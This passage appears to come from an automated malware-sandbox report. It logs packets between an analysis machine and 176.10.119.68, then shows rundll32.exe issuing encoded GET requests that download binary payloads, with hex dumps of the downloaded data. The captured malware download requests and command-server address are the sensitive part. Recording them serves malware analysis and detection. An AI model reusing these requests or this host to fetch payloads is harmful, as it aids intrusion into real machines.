                          May 26, 2022 04:06:52.892438889 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892461061 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892491102 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.892505884 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.892543077 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892566919 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892585993 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892606974 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.892664909 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.892705917 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893610001 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893644094 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893671989 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893681049 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893690109 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893712044 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893721104 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893743038 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893752098 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893774986 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893780947 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893795967 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.893811941 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.893831015 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894366980 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894408941 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894433022 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894454002 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894471884 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894490004 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894506931 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894524097 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894541025 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894547939 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894565105 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894576073 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894594908 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894603014 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894627094 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894690990 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894731998 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894741058 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894757032 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.894768000 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.894788027 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908045053 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908078909 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908101082 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908149958 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908165932 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908193111 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908202887 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908226013 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908236027 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908252954 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908274889 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908296108 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908459902 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908502102 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908524990 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908544064 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908555031 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908596992 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908607006 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908626080 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908639908 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908670902 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908685923 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908791065 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908808947 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908849001 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908868074 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908880949 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.908905983 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.908935070 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.909110069 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.909157991 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.909176111 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.909187078 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.909210920 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.909239054 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.920998096 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921032906 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921047926 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921060085 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921191931 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.921210051 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.921463013 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921484947 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921499968 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921511889 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.921552896 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.921600103 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.922487020 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.922509909 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.922525883 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.922537088 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.922591925 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.922624111 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.923270941 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923290014 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923305988 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923321009 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923336983 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923357010 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.923367977 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923382998 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923391104 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.923425913 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.923712969 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923732042 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923748016 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923758984 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.923772097 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.923825979 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.924022913 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.924041033 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.924057007 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.924074888 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.924081087 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.924123049 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.935115099 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.935152054 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.935168982 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.935182095 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.935283899 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.935326099 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.937022924 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937042952 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937058926 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937074900 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937091112 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937105894 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937119007 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937144041 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.937202930 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.937446117 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937463999 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937493086 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937503099 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.937520981 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937536955 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937546968 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.937566042 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.937582970 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.937608004 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.937628984 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938286066 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938302994 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938318014 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938328981 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938360929 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.938410044 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.938601017 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938616991 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938632965 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938643932 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.938671112 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.938698053 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.949590921 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.949631929 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.949651003 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.949672937 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.949688911 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.949723959 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.949791908 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:53.058631897 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:53.071225882 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:53.344055891 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:53.344110012 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:53.344240904 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:07:47.020793915 CEST4975280192.168.2.3176.10.119.68

                          HTTP Request Dependency Graph

                          • 176.10.119.68

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.349752176.10.119.6880C:\Windows\SysWOW64\rundll32.exe
                          TimestampkBytes transferredDirectionData
                          May 26, 2022 04:06:52.073632002 CEST1254OUTGET /drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 176.10.119.68
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          May 26, 2022 04:06:52.343399048 CEST1256INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 May 2022 02:06:52 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 186009
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="628ee0bc50572.bin"
                          Data Raw: 4b 5c 8f a0 e4 96 d1 34 f6 b0 0a 59 67 19 4d 99 87 6b cb e3 ad 41 b6 f5 85 76 27 ee 0f 6e 0e 58 a4 98 9c 46 9a 85 df 73 f6 fc 79 af fe b6 6c a5 03 12 9d f0 b4 8d ad d4 21 6d 57 94 38 ae ec 12 1e 60 ba f1 ac fe b0 f8 a8 b7 1f af ad da cf 85 db 35 4e 79 3d fb f9 c4 b4 3b 89 0b 52 0f 17 3c d8 7e b2 5e 57 b4 28 be e2 e6 7f 35 87 6e a1 c7 bf c5 6a fb 1d 78 ab 58 cb 75 4d 01 b9 e0 56 fd b9 96 07 53 47 e7 7e ef 63 68 e4 8a d3 46 86 f0 af b1 60 5c 37 50 0c 92 3d d1 82 fc 4e a0 c8 96 77 2f e2 1a 6c 87 61 5c 03 05 ef 3b a4 4b 99 05 a8 cd e1 ed a5 a5 52 02 52 81 41 60 64 44 ef 9b 02 f0 40 15 04 e9 44 5d 88 ac ab de 72 5d 73 92 c7 df a3 db 64 a9 61 43 cb 3a 6b 0e 32 19 05 38 06 c4 73 4c 60 49 dd 5c bf e2 56 c7 bb bf 36 4f 9b 6e 47 af da 37 55 15 08 62 6d 23 9b 1a 9b 71 d0 a8 f3 73 79 db f0 68 d3 f5 55 b5 08 fc b3 e4 7a cd 96 da 5e e0 3d 5c cb be d2 db 73 9a 6c f3 a1 c4 bc 35 14 54 db 00 24 29 30 76 5e fb e9 1d 30 8c 72 20 43 69 87 7f ea d3 e5 2b b6 50 e9 c2 6a 7d ef ec 60 21 da 02 fc e8 c8 24 c8 09 bd 19 9b 4e 1e 5d b3 71 1b b2 57 77 24 57 4a 8c 3d 85 89 da f9 fa e9 bc 1a dc 93 8a 12 9d ab 6e c6 8b 9c 61 f8 17 48 fc cc ab e7 86 14 58 01 37 53 50 dd 34 e4 43 66 05 7f 4b 64 df 07 59 a4 78 aa e2 36 9c 53 1d f8 4f aa 1b 90 0d 60 0b 50 f9 d5 b4 99 c7 b6 25 9a 5c eb 50 0f 8a b2 7b d9 c3 32 e3 25 50 eb d0 18 85 ab 69 4e 9d 46 87 3a 97 5c 91 ff 8e d4 f0 de b5 1b 0a c5 bc 18 4b 7e ed 98 9e fb dc 32 48 9b 44 33 e5 d7 a2 03 b2 98 52 3c a6 1f 60 06 01 c3 de ae 16 d6 7a eb a1 98 94 70 50 a7 5b f6 1e eb 99 5e ab 74 da fd a9 17 41 bc 2a 02 c7 72 5e f4 54 9f 54 50 64 25 15 45 f4 dd 0f 37 d9 b9 b9 63 ef 76 f5 5c 3c 9c 7d a7 e7 2d 03 4f 74 16 fe ea fe 3d 55 09 21 e8 c5 5d 32 2a 7f 7f fc 54 80 d1 78 5d 9f 2d 38 ba c9 6e 35 63 b0 06 c1 9e 64 4b 17 39 15 27 0d 05 75 b7 62 24 0f ac 20 84 69 85 96 e4 73 d7 f1 fa 79 ba 9c 55 8a ac 2b f5 95 0e c6 c5 5c b9 66 41 69 f1 af b0 d7 0f 00 3b 95 15 49 21 18 7a 80 c3 6a c9 03 09 2d 82 5c bd 0c 11 ed 60 9e 45 92 93 71 69 e1 53 a7 70 de 7e 23 c7 f1 b5 34 22 f9 1b 03 48 96 9d 41 31 3e 4b 3a 20 e1 7e b5 5f 33 d8 38 65 a5 34 5c 7b ae f2 f7 b6 4e 77 f6 86 33 b1 c7 4a 52 66 91 c3 ba 11 1e 92 6d cc 1a 0c e6 48 b1 b0 52 64 bf 61 a3 4f 5b 04 04 83 b6 fe 33 ff 99 df 5f 09 91 96 6c 9e 4f 80 5e 74 1f 8c 05 03 43 2c da 80 c7 44 86 db 01 43 08 ee 57 f2 0e 4c c4 91 51 31 71 46 bb 13 9c bb 00 04 b6 b1 b6 31 1c 88 01 fb 87 ed 01 4e ae 5e 9f 98 bf 12 9a 0c 28 72 74 6f 10 ff 10 fe 1e 63 8f 95 a5 e1 4e f9 36 3b b1 1a 3a 5b cf 32 51 de 0f ac 90 a4 25 6b d5 bf 49 fc 92 ba 33 b5 2f 26 77 39 a6 86 d5 df ab 0b 7f 0b 4e 7c b8 52 c0 b1 40 67 b3 43 38 e3 1c 2b 5b cc cc 11 9b 87 7f 14 c1 b9 70 c6 51 dd 18 82 41 f2 ad 8e ac 44 17 66 e4 72 ae 8d 7e c8 ac 48 45 6c 95 34 3d 08 9b b1 ef 77 f6 d5 cc 57 ed bd e7 3d 0b 2a ac 48 44 7c 20 f6 10 af b2 6d 61 2e b6 6d 80 16 bd 1b 60 51 fd ca a6 0c 71 eb e4 5a bd f7 e3 4c 46 e5 6b a0 9f d2 8c df fc b9 6c bb 45 c5 a4 4e ea 5e 6f ab f4 79 95 82 b5 fa 37 b8 37 70 93 eb 3c f6 65 4b 22 bf 38 52 89 ae 5b 1d 2d 8b 37 b3 81 76
                          Data Ascii: K\4YgMkAv'nXFsyl!mW8`5Ny=;R<~^W(5njxXuMVSG~chF`\7P=Nw/la\;KRRA`dD@D]r]sdaC:k28sL`I\V6OnG7Ubm#qsyhUz^=\sl5T$)0v^0r Ci+Pj}`!$N]qWw$WJ=naHX7SP4CfKdYx6SO`P%\P{2%PiNF:\K~2HD3R<`zpP[^tA*r^TTPd%E7cv\<}-Ot=U!]2*Tx]-8n5cdK9'ub$ isyU+\fAi;I!zj-\`EqiSp~#4"HA1>K: ~_38e4\{Nw3JRfmHRdaO[3_lO^tC,DCWLQ1qF1N^(rtocN6;:[2Q%kI3/&w9N|R@gC8+[pQADfr~HEl4=wW=*HD| ma.m`QqZLFklEN^oy77p<eK"8R[-7v
                          May 26, 2022 04:06:52.343425989 CEST1257INData Raw: b1 d5 91 a9 f7 4c 76 4d dc 60 fe a8 63 52 67 2c 6d d6 25 77 15 63 c8 73 9f 27 8d 8f ed 2d e5 16 52 93 45 65 c7 72 63 06 6a 4f fb 70 e2 91 56 c1 91 b4 82 4c 5d 84 27 79 59 23 32 65 01 27 2e a0 7e d2 b3 fc f4 41 c3 82 28 b6 0a fb 89 7e 3e 87 d5 d6
                          Data Ascii: LvM`cRg,m%wcs'-REercjOpVL]'yY#2e'.~A(~>)@UnrPZL(kTdC=&j6pZzNVLVxgy/6Otigv9=F]uFE\k2d^+4pbrL(
                          May 26, 2022 04:06:52.343854904 CEST1259INData Raw: 37 03 e5 16 70 84 ad 57 8d fa e6 94 8b df 25 16 6e d1 be 85 fc 9a f6 a7 97 1e 84 ac cc 45 9f 2c 53 9e eb 8a 95 2a 2a 9c ad 7b a7 e0 c1 03 c1 a3 22 aa 27 e5 28 0f 34 46 32 84 79 a9 f2 54 3c 7d 3f f8 26 47 ea dd ac 31 da eb 77 39 ad 7d 0c ca 64 fa
                          Data Ascii: 7pW%nE,S**{"'(4F2yT<}?&G1w9}djXw5(HV#-Z(&dT9ffKY?w,Xj}i?}z=gyq:b&V[(MNdqWaAkg,F4P:Br,XTvipv`35hme*
                          May 26, 2022 04:06:52.343890905 CEST1260INData Raw: 11 2f 83 63 e0 ea 27 c8 6f f4 a4 1b f9 61 91 b1 d5 2a d3 03 59 25 cc 9a 75 ff ca 15 64 00 70 87 ca 4e 0c 65 42 2e 03 94 73 cb b2 57 d0 28 11 d1 28 0b e9 1d 1d 53 7e 06 30 6a f4 51 0a 23 eb 2b db f4 2e 9d 86 b6 d2 d0 b1 40 d0 d9 e2 48 93 98 dd 21
                          Data Ascii: /c'oa*Y%udpNeB.sW((S~0jQ#+.@H!O-sRRAi/\''X#`U##)n,!EKfhh(K/->x"c:x5p!BBU]d]#|+|s
                          May 26, 2022 04:06:52.344276905 CEST1262INData Raw: df b0 2f e3 ca 2d c8 41 3d da ee ea 89 ee e6 bb 20 39 cb ea f9 29 f2 e7 40 09 c2 43 ef e2 04 1f e4 cf eb ea fc 6e 62 d0 00 d2 d5 47 8f 5c 46 2f bc ed d7 56 15 5e b9 97 6f 42 93 d6 95 9f 1c 4e d5 69 fa eb b9 cb e8 fc f1 ca b5 2e 43 73 e9 dd a4 07
                          Data Ascii: /-A= 9)@CnbG\F/V^oBNi.CsQ<X'Z^qGP.uw=#}J,6WYX\8l5JG9Zb's'Wb.sl^[~aTx3DqZ[7D0^@"ZN*lu`}}gxj
                          May 26, 2022 04:06:52.344316006 CEST1263INData Raw: b5 ae 1f 46 79 82 19 98 dd 1b ea a0 9b d0 fa ef 4c 3a 12 3b 30 76 f0 38 30 8c a6 29 1e 59 23 1e c2 52 1d b6 68 9d c7 90 f7 e1 47 3d f6 37 a6 2f e1 68 16 b1 d6 03 c6 6c dc 72 f6 4e 36 bc cb e1 fe 1f 45 a7 ca 33 e3 ee 9b ba 5c 9c f7 83 fa 30 80 bc
                          Data Ascii: FyL:;0v80)Y#RhG=7/hlrN6E3\0b8ic,^89|9MQK"}>?>Wse\P_D;Dh+]ai(^I+|Vm1c|_Hkq_-kkb|F_/+ P
                          May 26, 2022 04:06:52.344424963 CEST1263INData Raw: 3f d8 f0 e7 6c b2 a6 19 0f cf 3a 53 c2 ae ff ac a0 62 b9 11 26 32 fb a7 8b 7c 5c b9 1b b7 f7 f1 73 b9 97 a8 c4 7e ff 5f 34 6d ab 48 b5 8b 94 74 87 39 f0 fa fc e8 ba a9 6d 27 de 36 f4 a2 4c 2f 6e e7 e9 ac ae 7d f2 ee ab de ab 8f e6 ee 07 a7 5f e0
                          Data Ascii: ?l:Sb&2|\s~_4mHt9m'6L/n}_u]pp-?xh5qqr*tiy]uJC!m#3oQI<viqqs{-
                          May 26, 2022 04:06:52.344547987 CEST1265INData Raw: 06 c3 20 08 a7 5f da 94 12 03 0a a5 c3 94 c0 27 d1 d4 f0 24 2f d6 9c 90 ed cd f1 ce b6 a6 c3 e2 a2 13 35 63 85 a7 d1 b9 73 9e dc 52 2d 31 8a 59 53 7e aa ab 35 1a eb 2f 4d eb 0f cb d5 aa 00 da 20 de f6 79 16 aa aa 05 3c f4 77 0c 23 c0 0f fa 2b 95
                          Data Ascii: _'$/5csR-1YS~5/M y<w#+Knkgqi52 ?3`V.>.917rXbmE&#)WLk-`kF68if~O7|2?)(u_2O1#Z
                          May 26, 2022 04:06:52.344567060 CEST1266INData Raw: 88 66 6f 78 c2 79 8d ae b9 b1 59 e8 6a bd cc a1 04 2e e7 31 04 39 58 d9 5c 52 63 f5 5e 60 a8 c9 b5 13 46 ce a8 18 56 ff 6f 8e d3 80 32 e6 7e e8 98 60 6d e2 be 51 05 5a 6f 89 72 d9 85 00 e0 7a 65 7d 9c 31 ea 4c cf a3 00 c5 38 09 7a 2a b4 e5 e1 17
                          Data Ascii: foxyYj.19X\Rc^`FVo2~`mQZorze}1L8z*Dh!12-~=fL4}fgU$b ai~[%v|kAkQ~`pwZ|VTqcl6jmI7[5kc1y5hp]qN''r:Q
                          May 26, 2022 04:06:52.344721079 CEST1268INData Raw: 54 39 0f 6b ca 7f c6 e9 1c 51 55 6d 7b 8b b5 cb 2c b2 02 68 c8 26 64 6b db 41 7e d1 fc c1 06 21 fe 91 f2 c0 60 48 14 e3 53 4a a5 b6 61 8c c5 65 b6 37 c7 d3 19 94 fc d6 b9 c1 f5 22 94 43 53 fb 82 2b 18 51 23 b3 f9 b0 51 75 aa 88 07 a4 57 9a 64 78
                          Data Ascii: T9kQUm{,h&dkA~!`HSJae7"CS+Q#QuWdxjYdE+Gt@FcR>3{k14;P=bZy?t0HX5Q`N=r-X1?[&|0J6Ejs2z:]Ry<JxusTZ$'cQ
                          May 26, 2022 04:06:52.356909990 CEST1268INData Raw: ed 1d ee 23 23 cd b4 fa 78 e8 fb 7c 6a 35 73 81 a4 f6 da 47 44 0f fb ff 44 ce a3 68 12 40 ba fd 8c 50 88 5e 68 27 22 5e 72 e9 e8 13 a3 bf 96 52 f7 67 f2 02 22 e0 3d 8d 21 1a 58 74 a1 be 94 80 55 bf 59 09 d3 cf a8 a6 ac 0b 31 72 c7 f7 e8 78 7a 55
                          Data Ascii: ##x|j5sGDDh@P^h'"^rRg"=!XtUY1rxzU
                          May 26, 2022 04:06:52.529841900 CEST1453OUTGET /drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 176.10.119.68
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          May 26, 2022 04:06:52.807344913 CEST1455INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 May 2022 02:06:52 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 238749
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="628ee0bcc1763.bin"
